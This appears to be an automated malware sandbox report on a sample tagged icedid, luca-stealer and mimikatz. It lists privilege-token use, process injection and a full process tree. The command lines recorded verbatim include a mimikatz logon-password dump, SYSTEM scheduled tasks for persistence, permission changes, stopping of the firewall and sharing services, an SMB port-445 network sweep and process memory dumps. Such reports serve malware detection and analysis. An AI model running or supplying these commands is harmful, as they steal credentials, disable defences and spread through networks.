1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2452	ssssgc.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	580	vfshost.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
Token: SeDebugPrivilege	3728	dumpcore.exe
Token: SeShutdownPrivilege	3728	dumpcore.exe
Token: SeDebugPrivilege	1596	dumpcore.exe
Token: SeShutdownPrivilege	1596	dumpcore.exe
Token: SeDebugPrivilege	2488	dumpcore.exe
Token: SeShutdownPrivilege	2488	dumpcore.exe
Token: SeDebugPrivilege	3408	dumpcore.exe
Token: SeShutdownPrivilege	3408	dumpcore.exe
Token: SeDebugPrivilege	2188	dumpcore.exe
Token: SeDebugPrivilege	4932	dumpcore.exe
Token: SeShutdownPrivilege	4932	dumpcore.exe
Token: SeDebugPrivilege	3316	dumpcore.exe
Token: SeShutdownPrivilege	3316	dumpcore.exe
Token: SeDebugPrivilege	2052	dumpcore.exe
Token: SeShutdownPrivilege	2052	dumpcore.exe

Suspicious use of SetWindowsHookEx 10 IoCs

pid	Process
392	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
392	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
2952	wimnat.exe
2452	ssssgc.exe
832	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
832	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
4808	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
4808	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1356 wrote to memory of 2760	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	30
PID 1356 wrote to memory of 2760	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	30
PID 1356 wrote to memory of 2760	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	30
PID 1356 wrote to memory of 2760	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	30
PID 1356 wrote to memory of 2588	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	31
PID 1356 wrote to memory of 2588	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	31
PID 1356 wrote to memory of 2588	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	31
PID 1356 wrote to memory of 2588	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	31
PID 1356 wrote to memory of 2596	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	32
PID 1356 wrote to memory of 2596	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	32
PID 1356 wrote to memory of 2596	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	32
PID 1356 wrote to memory of 2596	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	32
PID 1356 wrote to memory of 2356	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	34
PID 1356 wrote to memory of 2356	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	34
PID 1356 wrote to memory of 2356	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	34
PID 1356 wrote to memory of 2356	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	34
PID 1356 wrote to memory of 2196	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	35
PID 1356 wrote to memory of 2196	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	35
PID 1356 wrote to memory of 2196	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	35
PID 1356 wrote to memory of 2196	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	35
PID 1356 wrote to memory of 1060	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	37
PID 1356 wrote to memory of 1060	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	37
PID 1356 wrote to memory of 1060	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	37
PID 1356 wrote to memory of 1060	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	37
PID 2760 wrote to memory of 580	2760	cmd.exe	42
PID 2760 wrote to memory of 580	2760	cmd.exe	42
PID 2760 wrote to memory of 580	2760	cmd.exe	42
PID 2760 wrote to memory of 580	2760	cmd.exe	42
PID 2196 wrote to memory of 2800	2196	cmd.exe	43
PID 2196 wrote to memory of 2800	2196	cmd.exe	43
PID 2196 wrote to memory of 2800	2196	cmd.exe	43
PID 2196 wrote to memory of 2800	2196	cmd.exe	43
PID 2596 wrote to memory of 3064	2596	cmd.exe	44
PID 2596 wrote to memory of 3064	2596	cmd.exe	44
PID 2596 wrote to memory of 3064	2596	cmd.exe	44
PID 2596 wrote to memory of 3064	2596	cmd.exe	44
PID 2356 wrote to memory of 3068	2356	cmd.exe	46
PID 2356 wrote to memory of 3068	2356	cmd.exe	46
PID 2356 wrote to memory of 3068	2356	cmd.exe	46
PID 2356 wrote to memory of 3068	2356	cmd.exe	46
PID 1356 wrote to memory of 2172	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	45
PID 1356 wrote to memory of 2172	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	45
PID 1356 wrote to memory of 2172	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	45
PID 1356 wrote to memory of 2172	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	45
PID 1356 wrote to memory of 2180	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	48
PID 1356 wrote to memory of 2180	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	48
PID 1356 wrote to memory of 2180	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	48
PID 1356 wrote to memory of 2180	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	48
PID 1356 wrote to memory of 2200	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	49
PID 1356 wrote to memory of 2200	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	49
PID 1356 wrote to memory of 2200	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	49
PID 1356 wrote to memory of 2200	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	49
PID 1356 wrote to memory of 2952	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	52
PID 1356 wrote to memory of 2952	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	52
PID 1356 wrote to memory of 2952	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	52
PID 1356 wrote to memory of 2952	1356	2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe	52
PID 2596 wrote to memory of 2764	2596	cmd.exe	51
PID 2596 wrote to memory of 2764	2596	cmd.exe	51
PID 2596 wrote to memory of 2764	2596	cmd.exe	51
PID 2596 wrote to memory of 2764	2596	cmd.exe	51
PID 2356 wrote to memory of 2700	2356	cmd.exe	53
PID 2356 wrote to memory of 2700	2356	cmd.exe	53
PID 2356 wrote to memory of 2700	2356	cmd.exe	53
PID 2356 wrote to memory of 2700	2356	cmd.exe	53

C:\Users\Admin\AppData\Local\Temp\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:392

C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe
1⤵
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\InfusedAppe\Corporate\log.txt
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\InfusedAppe\Corporate\vfshost.exe
    C:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:580
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3036
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3064
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\2024-11-26_fdcd0858c7855fe5d15be5345aec0c19_godropper_hacktools_icedid_luca-stealer_mimikatz.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3068
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop SharedAccess
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Windows\SysWOW64\net.exe
    net stop SharedAccess
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2800
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SharedAccess
      4⤵
      System Location Discovery: System Language Discovery
      PID:2348
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:1060
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop MpsSvc
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2172
- - C:\Windows\SysWOW64\net.exe
    net stop MpsSvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MpsSvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:2240
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net stop LanmanServer
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2180
- - C:\Windows\SysWOW64\net.exe
    net stop LanmanServer
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1148
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop LanmanServer
      4⤵
      System Location Discovery: System Language Discovery
      PID:2232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c sc config LanmanServer start= disabled
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2200
- - C:\Windows\SysWOW64\sc.exe
    sc config LanmanServer start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2488
- C:\Windows\TEMP\wimnat.exe
  C:\Windows\TEMP\wimnat.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2952
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2684
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2412
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:696
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:1668
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2008
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:1780
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:884
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2660
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3004
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2876
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2608
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2808
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2900
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:1536
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2052
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:1352
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2584
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:696
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:844
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2460
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2268
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:332
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:1620
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2988
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3004
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Windows\InfusedAppe\Priess\scan.bat
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:2756
- - C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exe
    GoogleCdoeUpdate.exe tcp 10.127.0.1 10.127.255.255 445 512 /save
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:2728
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3800
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3600
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2580
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3740
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3660
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2272
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:4128
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2684
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:4876
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3920
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2856
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:4480
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:4116
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:4148
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3392
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3024
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:2956
- C:\Windows\TEMP\dumpcore.exe
  C:\Windows\TEMP\dumpcore.exe -accepteula -mm [System Process] C:\Windows\TEMP\Scan.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:2912
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:4972
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3672
- C:\Windows\TEMP\dumpcore.exe
  C:\Windows\TEMP\dumpcore.exe -accepteula -mm System C:\Windows\TEMP\Scan.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:4416
- C:\Windows\TEMP\dumpcore.exe
  C:\Windows\TEMP\dumpcore.exe -accepteula -mm smss.exe C:\Windows\TEMP\Scan.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:3728
- C:\Windows\TEMP\Networks\taskmgr.exe
  C:\Windows\TEMP\Networks\taskmgr.exe
  2⤵
  - Executes dropped EXE
  PID:3772
- C:\Windows\TEMP\dumpcore.exe
  C:\Windows\TEMP\dumpcore.exe -accepteula -mm csrss.exe C:\Windows\TEMP\Scan.dmp
  2⤵
  - Executes dropped EXE
  - Modifies data under HKEY_USERS
  PID:1060
